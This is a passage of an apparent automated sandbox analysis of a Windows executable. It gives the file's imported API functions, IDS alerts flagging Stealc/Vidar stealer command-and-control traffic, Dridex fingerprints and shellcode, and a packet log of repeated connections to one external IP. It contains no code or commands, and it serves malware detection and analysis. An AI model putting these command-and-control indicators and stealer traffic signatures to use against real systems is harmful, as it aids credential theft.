                                                                                RT_GROUP_ICON0xf7b780x22dataEnglishUnited States0.9411764705882353
                                                                                RT_MANIFEST0xf7ba00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                Imports

                                                                                DLLImport
                                                                                KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                Possible Origin

                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                2024-07-26T17:53:22.098195+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971540.127.169.103192.168.2.6
                                                                                2024-07-26T17:54:58.184294+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64186443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:45.026078+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected443641795.75.212.60192.168.2.6
                                                                                2024-07-26T17:54:29.091020+0200TCP2049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST64170443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:24.958434+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64168443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:32.339070+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64172443192.168.2.65.75.212.60
                                                                                2024-07-26T17:55:03.839325+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64189443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:28.443967+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64170443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:38.210507+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64175443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:32.999458+0200TCP2051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1443641725.75.212.60192.168.2.6
                                                                                2024-07-26T17:54:32.999290+0200TCP2049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST64172443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:26.883415+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64169443192.168.2.65.75.212.60
                                                                                2024-07-26T17:53:44.137634+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436416640.68.123.157192.168.2.6
                                                                                2024-07-26T17:54:37.094243+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected443641745.75.212.60192.168.2.6
                                                                                2024-07-26T17:54:34.845731+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64173443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:44.185245+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64179443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:48.385165+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64181443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:39.270003+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64176443192.168.2.65.75.212.60
                                                                                2024-07-26T17:53:42.765660+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436416540.68.123.157192.168.2.6
                                                                                2024-07-26T17:55:05.455054+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64190443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:46.289932+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64180443192.168.2.65.75.212.60
                                                                                2024-07-26T17:55:01.759091+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64188443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:55.817975+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64184443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:59.450351+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64187443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:35.007420+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64174443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:41.779288+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64178443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:40.682041+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64177443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:51.783629+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64183443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:56.797425+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64185443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:31.666423+0200TCP2044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config443641715.75.212.60192.168.2.6
                                                                                2024-07-26T17:54:29.989042+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64171443192.168.2.65.75.212.60
                                                                                2024-07-26T17:54:50.224091+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex64182443192.168.2.65.75.212.60

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jul 26, 2024 17:54:22.529019117 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:22.529047966 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:22.529139996 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:22.540215969 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:22.540231943 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.331382990 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.332217932 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:23.374780893 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:23.374809027 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.375745058 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.375833035 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:23.378762960 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:23.424504995 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.883877039 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.883938074 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.883976936 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:23.883980036 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.884016991 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.884018898 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:23.884046078 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:23.884062052 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:23.982572079 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.982641935 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.982667923 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:23.982686996 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:23.982707977 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:23.982723951 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:24.015779018 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:24.015929937 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:24.015964985 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:24.015983105 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:24.015997887 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:24.016024113 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:24.016086102 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:24.016134024 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:24.016443014 CEST64167443192.168.2.623.197.127.21
                                                                                Jul 26, 2024 17:54:24.016458988 CEST4436416723.197.127.21192.168.2.6
                                                                                Jul 26, 2024 17:54:24.032973051 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:24.033035994 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:24.033128023 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:24.033401012 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:24.033432007 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:24.958331108 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:24.958434105 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:24.961278915 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:24.961308002 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:24.961723089 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:24.961795092 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:24.962100029 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.004518032 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:25.714176893 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:25.714369059 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:25.714371920 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.714446068 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.721304893 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.721353054 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:25.723179102 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.723228931 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:25.723320961 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.723464966 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.723480940 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:26.883315086 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:26.883414984 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:26.883935928 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:26.883945942 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:26.886261940 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:26.886267900 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.651540995 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.651618958 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.651633978 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.651648998 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.651674986 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.651689053 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.651817083 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.651834965 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.653563976 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.653584957 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.653656960 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.653933048 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.653944016 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:28.443862915 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:28.443967104 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:28.450239897 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:28.450247049 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:28.451929092 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:28.451932907 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.091130018 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.091186047 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.091306925 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.091329098 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.091344118 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.091346979 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.091408014 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.091834068 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.091851950 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.094048977 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.094149113 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.094279051 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.094547987 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.094584942 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.988846064 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.989042044 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.989456892 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.989481926 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.991336107 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.991348982 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.665920973 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.665976048 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.665999889 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.666034937 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.666057110 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.666080952 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.666117907 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.666163921 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.666388988 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.666409016 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.667988062 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.668024063 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.668104887 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.668308973 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.668318987 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.338996887 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.339070082 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.339591980 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.339601994 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.341202974 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.341207027 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.999310970 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.999381065 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.999409914 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.999438047 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.999653101 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.999675035 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:33.063740969 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:33.063836098 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:33.063941956 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:33.064201117 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:33.064235926 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.280920029 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.281012058 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.281172991 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.281529903 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.281564951 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.845604897 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.845731020 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.846436024 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.846462965 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.848095894 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.848109961 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.848151922 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.848192930 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.007277012 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.007420063 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.007945061 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.007972956 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.014286041 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.014300108 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.449419022 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.449533939 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.449573994 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.449618101 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.449688911 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.449721098 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.449785948 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.477912903 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.477969885 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.478140116 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.478141069 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.478209019 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.478279114 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.545553923 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.545610905 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.545722961 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.545723915 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.545799971 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.545861959 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.050899982 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.050934076 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.050961971 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.050997019 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.051011086 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.051053047 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051054001 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051134109 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.051211119 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051211119 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051212072 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051212072 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051234007 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.051295042 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.052057981 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.052098036 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.057746887 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.057774067 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.057835102 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.057857990 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.057892084 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.057912111 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.063626051 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.063647985 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.063836098 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.063851118 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.063908100 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.072124004 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.072148085 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.072216034 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.072227955 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.072253942 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.072272062 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.076546907 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.076572895 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.076618910 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.076637983 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.076661110 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.076680899 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.080923080 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.080950975 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.081041098 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.081056118 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.081109047 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.084778070 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.084801912 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.084871054 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.084882975 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.084933043 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.088191032 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.088215113 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.088264942 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.088277102 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.088305950 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.088325024 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.091722012 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.091749907 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.091795921 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.091808081 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.091836929 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.091856956 CEST64174443192.168.2.65.75.212.60
